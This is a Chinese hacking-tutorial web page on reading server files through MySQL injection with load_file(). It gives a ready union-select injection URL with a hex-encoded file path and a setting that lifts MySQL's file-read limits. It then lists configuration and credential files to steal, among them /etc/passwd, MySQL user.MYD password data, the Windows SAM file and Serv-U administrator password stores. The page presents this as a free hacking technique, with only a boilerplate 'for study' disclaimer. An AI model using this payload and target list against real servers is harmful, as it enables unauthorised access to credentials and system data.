【免费黑客技术】load_file()查看常用的一些配置文件_安琪教程网

黑客教程

【免费黑客技术】load_file()查看常用的一些配置文件

时间:2018/10/12 9:59:36 作者:安琪 来自:www.aqfls.com 浏览:456 评论:0
内容摘要:mysql文件读取http://127.0.0.1/01-cookie/selectarticle.php?id=-1unionselect1,2,load_file(0x433A5C5C78616D70705C5C6874646F63735C5C30312D636F6F6B69655C5C31322E706870),...

mysql文件读取

http://127.0.0.1/01-cookie/selectarticle.php?id=-1 union select 1,2,load_file(0x433A5C5C78616D70705C5C6874646F63735C5C30312D636F6F6B69655C5C31322E706870),4,5

【免费黑客技术】load_file()查看常用的一些配置文件


配置my.ini 设置可以读写任何地方
secure-file-priv= 

load_file()查看常用的一些配置文件

/usr/local/apache/htdocs/comm/config.php

/usr/local/app/apache2/conf/httpd.conf                           //apache2缺省配置文件

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf              //虚拟网站设置

/usr/local/apache2/conf/httpd.conf

/etc/httpd/conf/httpd.conf apache                                配置文件

/etc/rsyncd.conf                                                 同步程序配置文件

/etc/sysconfig/network-scripts/ifcfg-eth0                         察看IP.

/usr/local/app/php5/lib/php.ini                                 //PHP相关设置

ect/password

/etc/my.cnf                                                     //mysql的配置文件

/etc/redhat-release                                             //系统版本

/etc/sysconfig/iptables                                         //从中得到防火墙规则策略

/etc/my.ini

/etc/php5/apache2/php.ini 


information_schema  读取mysql表





c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

C:\Program Files\Serv-U\ServUDaemon.ini

c:\windows\my.ini

C:\WINDOWS\system32\inetsrv\MetaBase.xml                        IIS配置文件

c:\boot.ini

C:\mysql\data\mysql\user.MYD                                    //存储了mysql.user表中的数据库连接密码

c:\windows\php.ini

c:\php.ini

temp                                                            缓存里面储存的信息

c:\windows\repair\sam                                            存储了WINDOWS系统初次安装的密码

c:\Program Files\ Serv-U\ServUAdmin.exe                         6.0版本以前的serv-u管理员密码存储于此

c:\Program Files\RhinoSoft.com\ServUDaemon.exe

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件 


D:\MySQL DataFiles\mysql\user.MYD



标签:免费黑客技术 


本站所有资源默认解压密码:www.aqfls.com 如有问题请联系管理员说明


本站资源仅供学习参考,所有资源均来源于网络搜索及网友提供,所有言论并不代表本站立场

投诉与建议 文章投稿 E-mail:1437232096@qq.com

上一篇:没有了
下一篇:利用【ewebeditor漏洞】巧妙拿webshell
相关评论
加载中